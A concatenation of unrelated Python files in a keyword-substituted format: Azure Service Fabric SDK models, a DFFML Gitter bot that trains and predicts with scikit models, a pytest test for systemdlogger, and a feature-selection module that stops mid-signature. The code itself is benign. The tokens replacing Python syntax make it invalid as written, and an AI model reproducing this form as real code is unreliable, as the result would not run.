constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param target_replica_set_size: The target replica set size as a number. :type target_replica_set_size: int :param min_replica_set_size: The minimum replica set size as a number. :type min_replica_set_size: int :param replica_restart_wait_duration: The duration between when a replica goes down and when a new replica is created, represented in ISO 8601 format (hh:mm:ss.s). :type replica_restart_wait_duration: ~datetime.datetime :param quorum_loss_wait_duration: The maximum duration for which a partition is allowed to be in a state of quorum loss, represented in ISO 8601 format (hh:mm:ss.s). :type quorum_loss_wait_duration: ~datetime.datetime :param stand_by_replica_keep_duration: The definition on how long StandBy replicas should be maintained before being removed, represented in ISO 8601 format (hh:mm:ss.s). :type stand_by_replica_keep_duration: ~datetime.datetime """<line_sep>_validation={'service_kind':{'required':<true>} 'target_replica_set_size':{'minimum':1} 'min_replica_set_size':{'minimum':1} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} 'target_replica_set_size':{'key':'targetReplicaSetSize' 'type':'int'} 'min_replica_set_size':{'key':'minReplicaSetSize' 'type':'int'} 'replica_restart_wait_duration':{'key':'replicaRestartWaitDuration' 'type':'iso-8601'} 'quorum_loss_wait_duration':{'key':'quorumLossWaitDuration' 'type':'iso-8601'} 'stand_by_replica_keep_duration':{'key':'standByReplicaKeepDuration' 'type':'iso-8601'} }<def_stmt>__init__ self **kwargs<block_start>super(StatefulServiceUpdateProperties self).__init__(**kwargs)<line_sep>self.service_kind='Stateful'# type: str self.target_replica_set_size=kwargs.get('target_replica_set_size' <none>)<line_sep>self.min_replica_set_size=kwargs.get('min_replica_set_size' <none>)<line_sep>self.replica_restart_wait_duration=kwargs.get('replica_restart_wait_duration' <none>)<line_sep>self.quorum_loss_wait_duration=kwargs.get('quorum_loss_wait_duration' <none>)<line_sep>self.stand_by_replica_keep_duration=kwargs.get('stand_by_replica_keep_duration' <none>)<block_end><block_end><class_stmt>StatelessServiceProperties(ServiceResourceProperties)<block_start>"""The properties of a stateless service resource. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param service_type_name: The name of the service type. :type service_type_name: str :param partition_description: Describes how the service is partitioned. :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription :param service_package_activation_mode: The activation Mode of the service package. Possible values include: "SharedProcess", "ExclusiveProcess". :type service_package_activation_mode: str or ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode :param service_dns_name: Dns name used for the service. If this is specified, then the service can be accessed via its DNS name instead of service name. :type service_dns_name: str :param instance_count: The instance count. :type instance_count: int :param instance_close_delay_duration: Delay duration for RequestDrain feature to ensures that the endpoint advertised by the stateless instance is removed before the delay starts prior to closing the instance. This delay enables existing requests to drain gracefully before the instance actually goes down (https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-application-upgrade-advanced#avoid-connection-drops-during-stateless-service-planned-downtime-preview). It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type instance_close_delay_duration: str """<line_sep>_validation={'provisioning_state':{'readonly':<true>} 'service_kind':{'required':<true>} 'instance_count':{'minimum':-1} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'provisioning_state':{'key':'provisioningState' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} 'service_type_name':{'key':'serviceTypeName' 'type':'str'} 'partition_description':{'key':'partitionDescription' 'type':'PartitionSchemeDescription'} 'service_package_activation_mode':{'key':'servicePackageActivationMode' 'type':'str'} 'service_dns_name':{'key':'serviceDnsName' 'type':'str'} 'instance_count':{'key':'instanceCount' 'type':'int'} 'instance_close_delay_duration':{'key':'instanceCloseDelayDuration' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(StatelessServiceProperties self).__init__(**kwargs)<line_sep>self.service_kind='Stateless'# type: str self.instance_count=kwargs.get('instance_count' <none>)<line_sep>self.instance_close_delay_duration=kwargs.get('instance_close_delay_duration' <none>)<block_end><block_end><class_stmt>StatelessServiceUpdateProperties(ServiceResourceUpdateProperties)<block_start>"""The properties of a stateless service resource for patch operations. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param instance_count: The instance count. :type instance_count: int :param instance_close_delay_duration: Delay duration for RequestDrain feature to ensures that the endpoint advertised by the stateless instance is removed before the delay starts prior to closing the instance. This delay enables existing requests to drain gracefully before the instance actually goes down (https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-application-upgrade-advanced#avoid-connection-drops-during-stateless-service-planned-downtime-preview). It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type instance_close_delay_duration: str """<line_sep>_validation={'service_kind':{'required':<true>} 'instance_count':{'minimum':-1} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} 'instance_count':{'key':'instanceCount' 'type':'int'} 'instance_close_delay_duration':{'key':'instanceCloseDelayDuration' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(StatelessServiceUpdateProperties self).__init__(**kwargs)<line_sep>self.service_kind='Stateless'# type: str self.instance_count=kwargs.get('instance_count' <none>)<line_sep>self.instance_close_delay_duration=kwargs.get('instance_close_delay_duration' <none>)<block_end><block_end><class_stmt>SystemData(msrest.serialization.Model)<block_start>"""Metadata pertaining to creation and last modification of the resource. :param created_by: The identity that created the resource. :type created_by: str :param created_by_type: The type of identity that created the resource. :type created_by_type: str :param created_at: The timestamp of resource creation (UTC). :type created_at: ~datetime.datetime :param last_modified_by: The identity that last modified the resource. :type last_modified_by: str :param last_modified_by_type: The type of identity that last modified the resource. :type last_modified_by_type: str :param last_modified_at: The timestamp of resource last modification (UTC). :type last_modified_at: ~datetime.datetime """<line_sep>_attribute_map={'created_by':{'key':'createdBy' 'type':'str'} 'created_by_type':{'key':'createdByType' 'type':'str'} 'created_at':{'key':'createdAt' 'type':'iso-8601'} 'last_modified_by':{'key':'lastModifiedBy' 'type':'str'} 'last_modified_by_type':{'key':'lastModifiedByType' 'type':'str'} 'last_modified_at':{'key':'lastModifiedAt' 'type':'iso-8601'} }<def_stmt>__init__ self **kwargs<block_start>super(SystemData self).__init__(**kwargs)<line_sep>self.created_by=kwargs.get('created_by' <none>)<line_sep>self.created_by_type=kwargs.get('created_by_type' <none>)<line_sep>self.created_at=kwargs.get('created_at' <none>)<line_sep>self.last_modified_by=kwargs.get('last_modified_by' <none>)<line_sep>self.last_modified_by_type=kwargs.get('last_modified_by_type' <none>)<line_sep>self.last_modified_at=kwargs.get('last_modified_at' <none>)<block_end><block_end><class_stmt>UniformInt64RangePartitionSchemeDescription(PartitionSchemeDescription)<block_start>"""Describes a partitioning scheme where an integer range is allocated evenly across a number of partitions. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme :param count: Required. The number of partitions. :type count: int :param low_key: Required. String indicating the lower bound of the partition key range that should be split between the partition ‘count’. :type low_key: str :param high_key: Required. String indicating the upper bound of the partition key range that should be split between the partition ‘count’. :type high_key: str """<line_sep>_validation={'partition_scheme':{'required':<true>} 'count':{'required':<true>} 'low_key':{'required':<true>} 'high_key':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} 'count':{'key':'count' 'type':'int'} 'low_key':{'key':'lowKey' 'type':'str'} 'high_key':{'key':'highKey' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UniformInt64RangePartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme='UniformInt64Range'# type: str self.count=kwargs['count']<line_sep>self.low_key=kwargs['low_key']<line_sep>self.high_key=kwargs['high_key']<block_end><block_end><class_stmt>UpgradableVersionPathResult(msrest.serialization.Model)<block_start>"""The list of intermediate cluster code versions for an upgrade or downgrade. Or minimum and maximum upgradable version if no target was given. :param supported_path: :type supported_path: list[str] """<line_sep>_attribute_map={'supported_path':{'key':'supportedPath' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(UpgradableVersionPathResult self).__init__(**kwargs)<line_sep>self.supported_path=kwargs.get('supported_path' <none>)<block_end><block_end><class_stmt>UpgradableVersionsDescription(msrest.serialization.Model)<block_start>"""UpgradableVersionsDescription. All required parameters must be populated in order to send to Azure. :param target_version: Required. The target code version. :type target_version: str """<line_sep>_validation={'target_version':{'required':<true>} }<line_sep>_attribute_map={'target_version':{'key':'targetVersion' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UpgradableVersionsDescription self).__init__(**kwargs)<line_sep>self.target_version=kwargs['target_version']<block_end><block_end><class_stmt>UserAssignedIdentity(msrest.serialization.Model)<block_start>"""UserAssignedIdentity. Variables are only populated by the server, and will be ignored when sending a request. :ivar principal_id: The principal id of user assigned identity. :vartype principal_id: str :ivar client_id: The client id of user assigned identity. :vartype client_id: str """<line_sep>_validation={'principal_id':{'readonly':<true>} 'client_id':{'readonly':<true>} }<line_sep>_attribute_map={'principal_id':{'key':'principalId' 'type':'str'} 'client_id':{'key':'clientId' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(UserAssignedIdentity self).__init__(**kwargs)<line_sep>self.principal_id=<none><line_sep>self.client_id=<none><block_end><block_end>
<import_stmt>io<import_stmt>re<import_stmt>json<import_stmt>tempfile<import_stmt>contextlib<import_from_stmt>aiohttp ClientSession ClientTimeout<import_from_stmt>dffml.cli.cli CLI<import_from_stmt>dffml op config Definition BaseSecret<line_sep>ACCESSTOKEN=Definition(name="access_token" primitive="str")<line_sep>ROOMNAME=Definition(name="room_name" primitive="str")<line_sep>ROOMID=Definition(name="room_id" primitive="str")<line_sep>MESSAGE=Definition(name="message" primitive="str")<line_sep>TOSEND=Definition(name="to_send" primitive="str")<line_sep>@config<class_stmt>GitterChannelConfig<block_start>secret:BaseSecret<block_end>@op(inputs={"room_uri":ROOMNAME} outputs={"room_id":ROOMID} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true>) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>get_room_id self room_uri# Get unique roomid from room uri <block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Content-Type":"application/json" "Accept":"application/json" "Authorization":f"Bearer {access_token}" }<line_sep>api_url=<await>self.sctx.get("api_url")<line_sep>url=f"{api_url}/rooms"<async_keyword><with_stmt>self.parent.session.post(url json={"uri":room_uri} headers=headers)<as>resp<block_start>response=<await>resp.json()<line_sep><return>{"room_id":response["id"]}<block_end><block_end>@op(inputs={"room_id":ROOMID} outputs={"message":MESSAGE} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true> timeout=ClientTimeout(total=<none>)) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>stream_chat self room_id# Listen to messages in room <block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Accept":"application/json" "Authorization":f"Bearer {access_token}" }<line_sep>stream_url=<await>self.sctx.get("stream_url")<line_sep>url=f"{stream_url}/rooms/{room_id}/chatMessages"<line_sep>botname=<await>self.sctx.get("botname")<async_keyword><with_stmt>self.parent.session.get(url headers=headers)<as>resp<block_start><async_keyword><for_stmt>data resp.content# Gitter sends " \n" at some intervals <block_start><if_stmt>data<eq>" \n".encode()<block_start><continue><block_end>data=json.loads(data.strip())<line_sep>message=data["text"]<line_sep># Only listen to messages directed to bot <if_stmt>f"@{botname}"<not><in>message<block_start><continue><block_end><yield>{"message":message}<block_end><block_end><block_end>@op(inputs={"message":TOSEND "room_id":ROOMID} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret "session":<lambda>self:ClientSession(trust_env=<true>) } ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>send_message self message room_id<block_start>access_token=<await>self.sctx.get("access_token")<line_sep>headers={"Content-Type":"application/json" "Accept":"application/json" "Authorization":f"Bearer {access_token}" }<try_stmt><block_start>message=json.loads(message)<line_sep>message=json.dumps(message indent=4 sort_keys=<true>)<block_end><except_stmt><block_start><pass><block_end># For new line we need \\n,else Gitter api # responds with 'Bad Request' message=message.replace("\n" "\\n")<line_sep>api_url=<await>self.sctx.get("api_url")<line_sep>url=f"{api_url}/rooms/{room_id}/chatMessages"<async_keyword><with_stmt>self.parent.session.post(url headers=headers json={"text":message})<as>resp<block_start>response=<await>resp.json()<line_sep><return><block_end><block_end>@op(inputs={"message":MESSAGE } outputs={"message":TOSEND} config_cls=GitterChannelConfig imp_enter={"secret":<lambda>self:self.config.secret} ctx_enter={"sctx":<lambda>self:self.parent.secret()} )<async_keyword><def_stmt>interpret_message self message<block_start>greet=["hey" "hello" "hi"]<for_stmt>x greet<block_start><if_stmt>x<in>message.lower()<block_start><return>{"message":"Hey Hooman ฅ^•ﻌ•^ฅ"}<block_end><block_end><def_stmt>extract_data raw_data<block_start>""" Parses data from text eg >>> raw_data = " details: features: Years:int:1 Expertise:int:1 Trust:float:1 predict: Salary:float:1 data: Years,Expertise,Trust,Salary 0,1,0.1,10 1,3,0.2,20 2,5,0.3,30 3,7,0.4,40 " >>> extract_data(raw_data) { model-data: " Years,Expertise,Trust,Salary 0,1,0.1,10 1,3,0.2,20 2,5,0.3,30 3,7,0.4,40 " , features: Years:int:1 Expertise:int:1 Trust:float:1 , predict: Salary:float:1 } """<line_sep>raw_data=raw_data.split("data:")# (Feature details, training data) data={"model-data":raw_data[1]}<line_sep>raw_data=raw_data[0].split("\n")<line_sep># splits feature details to separate lines # Iterate and add to to dictionary `data` <for_stmt>x raw_data<block_start>k,*v=x.split(":")<if_stmt>isinstance(v list)# for features <block_start>v=":".join(v)<block_end>k=k.strip()<line_sep>v=v.strip()<if_stmt>k# avoid blank <block_start>data[k]=v<block_end><block_end><return>data<block_end># Removing username from message # The regex matches @ followed by anything that # is not a whitespace in the first group and # the rest of the string in the second group. # We replace the string by the second group. message=re.sub(r"(@[^\s]+)(.*)" r"\2" message).strip()<if_stmt>message.lower().startswith("train model")<block_start><return>{"message":"Gimme more info!!"}<block_end><elif_stmt>message.lower().startswith("predict:")# Only replace first occurrence of predict # because the feature to predict will be labeled predict <block_start>raw_data=message.replace("predict:" "" 1).strip()<line_sep>cmds=["predict" "all"]<block_end><elif_stmt>message.lower().startswith("details:")<block_start>raw_data=message.replace("details:" "" ).strip()<line_sep>cmds=["train"]<block_end><else_stmt><block_start><return>{"message":" Oops ,I didnt get that ᕙ(⇀‸↼‶)ᕗ "}<block_end># We'll use scikit logistic regression data=extract_data(raw_data)<line_sep>model_type="scikitlr"<line_sep>features=data["features"].split(" ")<line_sep>predict=data["predict"]<line_sep>model_data=data["model-data"]<with_stmt>tempfile.NamedTemporaryFile(suffix=".csv")<as>fileobj<block_start>fileobj.write(model_data.lstrip().encode())<line_sep>fileobj.seek(0)<line_sep>stdout=io.StringIO()<with_stmt>contextlib.redirect_stdout(stdout)<block_start>preds=<await>CLI.cli(*cmds "-model" model_type "-model-location" "tempModel" "-model-features" *features "-model-predict" predict "-sources" "f=csv" "-source-filename" fileobj.name )<block_end><block_end><if_stmt>"train"<in>cmds<block_start><return>{"message":"Done!!"}<block_end><else_stmt><block_start>m={}<for_stmt>pred preds<block_start>pred=pred.predictions()<line_sep>m.update({p:pred[p]["value"]<for>p pred})<block_end>message=[f"{k}: {v}"<for>k,v m.items()]<line_sep>message="\n".join(message)<block_end><return>{"message":message}<block_end>
<import_stmt>pytest<import_from_stmt>unittest.mock patch<import_stmt>tests.fixtures.journal<as>FakeJournalExporter<import_from_stmt>systemdlogger.elasticsearch ElasticsearchLogger<line_sep>@pytest.mark.parametrize(('config_path') ['tests/fixtures/config_es.json'])<class_stmt>TestRunner<block_start><def_stmt>setup_method self method<block_start>""" setup any state tied to the execution of the given method in a class. setup_method is invoked for every test method of a class. """<line_sep>modules={'systemdlogger.journal':FakeJournalExporter}<line_sep>self.module_patcher=patch.dict('sys.modules' modules)<line_sep>self.module_patcher.start()<import_from_stmt>systemdlogger.runner Runner<line_sep>self.Runner=Runner<block_end><def_stmt>teardown_method self method<block_start>""" teardown any state that was previously setup with a setup_method call. """<line_sep>self.module_patcher.stop()<block_end><def_stmt>test_init self config_path<block_start>runner=self.Runner(config_path)<assert_stmt>len(runner.loggers)<eq>1<assert_stmt>isinstance(runner.loggers[0] ElasticsearchLogger)<block_end><def_stmt>test_run self config_path<block_start>runner=self.Runner(config_path)<line_sep>runner.run()<block_end><block_end>
""" Selectors """<import_stmt>inspect<import_from_stmt>collections defaultdict<import_from_stmt>itertools combinations<import_from_stmt>typing List Optional Union Dict Callable<import_stmt>numpy<as>np<import_from_stmt>scipy.linalg lstsq<import_from_stmt>scipy.optimize minimize NonlinearConstraint<import_from_stmt>sklearn.linear_model LinearRegression<import_from_stmt>sklearn.metrics get_scorer<import_from_stmt>joblib Parallel delayed<line_sep># pylint: disable=R0201 <class_stmt>BaseSelector<block_start>""" Feature selector. This is meant to work on relatively smaller number of features """<def_stmt>__init__ self coef_thres:float=1e-6 method:str="SLSQP"<block_start>""" Base selector Args: coef_thres (float): threshold to discard certain coefficents method (str): optimization methods in scipy.optmize.minimize """<line_sep>self.coef_thres=coef_thres<line_sep>self.is_fitted=<false><line_sep>self.coef_:Optional[np.ndarray]=<none><line_sep>self.method=method<line_sep>self.indices:Optional[np.ndarray]=<none><block_end><def_stmt>select self x:np.ndarray y:np.ndarray options:Optional[Dict]=<none><arrow>Optional[np.ndarray]<block_start>""" Select feature indices from x Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets options (dict): options in the optimizations provided to scipy.optimize.minimize Returns: list of int indices """<line_sep>n_data,n_dim=x.shape<line_sep>options=options<or>{"maxiter":1e4 "ftol":1e-12}<line_sep>res=minimize(<lambda>beta:self.construct_loss(x=x y=y beta=beta) [0]<times>n_dim jac=self.construct_jac(x=x y=y) method=self.method constraints=self.construct_constraints(x=x y=y) options=options )<if_stmt>res.status<ne>0<block_start><raise>RuntimeError(f"Not converged, status {res.status}")<block_end>self.is_fitted=<true><line_sep>self.coef_=res.x<line_sep># output coefficient indices that are above certain thresholds self.indices=np.where(np.abs(self.coef_)<g>self.coef_thres)[0]# type: ignore self.coef_[np.where(np.abs(self.coef_)<le>self.coef_thres)[0]]=0.0# type: ignore <return>self.indices<block_end><def_stmt>construct_loss self x:np.ndarray y:np.ndarray beta:np.ndarray<arrow>float<block_start>""" Get loss function from data and tentative coefficients beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: loss value """<line_sep><raise>NotImplementedError<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>Optional[Union[Dict List NonlinearConstraint]]<block_start>""" Get constraints dictionary from data, e.g., {"func": lambda beta: fun(x, y, beta), "type": "ineq"} Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): parameter to optimize Returns: dict of constraints """<line_sep><return><none><block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<arrow>Optional[Callable]<block_start>""" Jacobian of cost function Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: Jacobian function """<line_sep><return><none><block_end><def_stmt>evaluate self x:np.ndarray y:np.ndarray metric:str="neg_mean_absolute_error"<arrow>float<block_start>""" Evaluate the linear models using x, and y test data Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets metric (str): scorer function, used with sklearn.metrics.get_scorer Returns: """<line_sep>metric_func=get_scorer(metric)<line_sep>lr=LinearRegression(fit_intercept=<false>)<line_sep>lr.coef_=self.coef_[self.indices]# type: ignore lr.intercept_=0<line_sep><return>metric_func(lr x[: self.indices] y)<block_end><def_stmt>get_coef self<arrow>Optional[np.ndarray]<block_start>""" Get coefficients Returns: the coefficients array """<line_sep><return>self.coef_<block_end><def_stmt>get_feature_indices self<arrow>Optional[np.ndarray]<block_start>""" Get selected feature indices Returns: """<line_sep><return>self.indices<block_end><def_stmt>predict self x:np.ndarray<arrow>np.ndarray<block_start>""" Predict the results using sparsified coefficients Args: x (np.ndarray): design matrix Returns: """<line_sep><return>x[: self.indices].dot(self.coef_[self.indices])<block_end># type: ignore <def_stmt>compute_residual self x:np.ndarray y:np.ndarray<arrow>np.ndarray<block_start>""" Compute Args: x (np.ndarray): design matrix y (np.ndarray): target vector Returns: residual vector """<line_sep><return>y-self.predict(x)<block_end>@classmethod<def_stmt>_get_param_names cls<block_start>init=getattr(cls.__init__ "deprecated_original" cls.__init__)<if_stmt>init<is>object.__init__<block_start><return>[]<block_end>init_signature=inspect.signature(init)<line_sep>parameters=[p<for>p init_signature.parameters.values()<if>p.name<ne>"self"<and>p.kind<ne>p.VAR_KEYWORD]<for_stmt>p parameters<block_start><if_stmt>p.kind<eq>p.VAR_KEYWORD<block_start><raise>RuntimeError("scikit-learn estimators should always "<concat>"specify their parameters in the signature"<concat>" of their __init__ (no varargs)."<concat>" %s with constructor %s doesn't "<concat>" follow this convention."%(cls init_signature))<block_end><block_end><return>sorted([p.name<for>p parameters])<block_end><def_stmt>get_params self<block_start>""" Get params for this selector Returns: mapping of string to any parameter names mapped to their values """<line_sep>out={}<for_stmt>key self._get_param_names()<block_start>value=getattr(self key <none>)<line_sep>out[key]=value<block_end><return>out<block_end><def_stmt>set_params self **params<block_start>""" Set the parameters of this selector Args: **params: dict Selector parametrs Returns: self: selector instance """<if_stmt><not>params# Simple optimization to gain speed (inspect is slow) <block_start><return>self<block_end>valid_params=self.get_params()<line_sep>nested_params=defaultdict(dict)# grouped by prefix <for_stmt>key,value params.items()<block_start>key,delim,sub_key=key.partition("__")<if_stmt>key<not><in>valid_params<block_start><raise>ValueError("Invalid parameter %s for selector %s. "<concat>"Check the list of available parameters "<concat>"with `estimator.get_params().keys()`."%(key self))<block_end><if_stmt>delim<block_start>nested_params[key][sub_key]=value<block_end><else_stmt><block_start>setattr(self key value)<line_sep>valid_params[key]=value<block_end><block_end><for_stmt>key,sub_params nested_params.items()<block_start>valid_params[key].set_params(**sub_params)<block_end><return>self<block_end><block_end><class_stmt>DantzigSelector(BaseSelector)<block_start>""" Equation 11 in https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf and reference in https://projecteuclid.org/download/pdfview_1/euclid.aos/1201012958 """<def_stmt>__init__ self lambd sigma=1.0 **kwargs<block_start>""" Dantzig selector Args: lamb: tunable parameter sigma: standard deviation of the error """<line_sep>self.lambd=lambd<line_sep>self.sigma=sigma<line_sep>super().__init__(**kwargs)<block_end><def_stmt>construct_loss self x y beta<arrow>float<block_start>""" Get loss function from data and tentative coefficients beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: loss value """<line_sep><return>np.sum(np.abs(beta)).item()<block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<arrow>Callable<block_start>""" Jacobian of cost functions Args: x: y: Returns: """<def_stmt>_jac beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.1]=1.0<line_sep>sign<augmul>30.0# multiply the gradients to get better convergence <return>sign<block_end><return>_jac<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>NonlinearConstraint<block_start>""" Get constraints dictionary from data, e.g., {"func": lambda beta: fun(x, y, beta), "type": "ineq"} Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): placeholder Returns: dict of constraints """<def_stmt>_constraint beta<block_start><return>np.linalg.norm(x.T@(y-x@beta) np.infty)<block_end><def_stmt>_jac beta<block_start>vec=x.T@(y-x@beta)<line_sep>max_ind=np.argmax(np.abs(vec))<line_sep>der=np.zeros_like(vec.ravel())<line_sep>der[max_ind]=np.sign(vec[max_ind])<line_sep><return>-x.T.dot(x).dot(der)<block_end><return>NonlinearConstraint(_constraint -np.infty self.lambd<times>self.sigma jac=_jac)<block_end><block_end><class_stmt>PenalizedLeastSquares(BaseSelector)<block_start>""" Penalized least squares. In addition to minimizing the sum of squares loss, it adds an additional penalty to the coefficients """<def_stmt>construct_loss self x:np.ndarray y:np.ndarray beta:np.ndarray<arrow>float<block_start>""" Construct the loss function. An extra penalty term is added Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: sum of errors """<line_sep>n=x.shape[0]<line_sep>se=1.0/(2<times>n)<times>np.sum((y-x.dot(beta))<power>2)+self.penalty(beta x=x y=y)<line_sep><return>se<block_end><def_stmt>_sse_jac self x y beta<block_start>n=x.shape[0]<line_sep><return>1.0/n<times>(y-x.dot(beta)).T.dot(-x)<block_end><def_stmt>_penalty_jac self x y beta<block_start><return>0.0<block_end><def_stmt>construct_jac self x:np.ndarray y:np.ndarray<block_start>""" Construct the jacobian of loss function Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: jacobian vector """<def_stmt>_jac beta<block_start><return>self._sse_jac(x y beta)+self._penalty_jac(x y beta)<block_end><return>_jac<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>List[Optional[Dict]]<block_start>""" No constraints Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): placeholder only Returns: a list of dictionary constraints """<line_sep><return>[]<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N 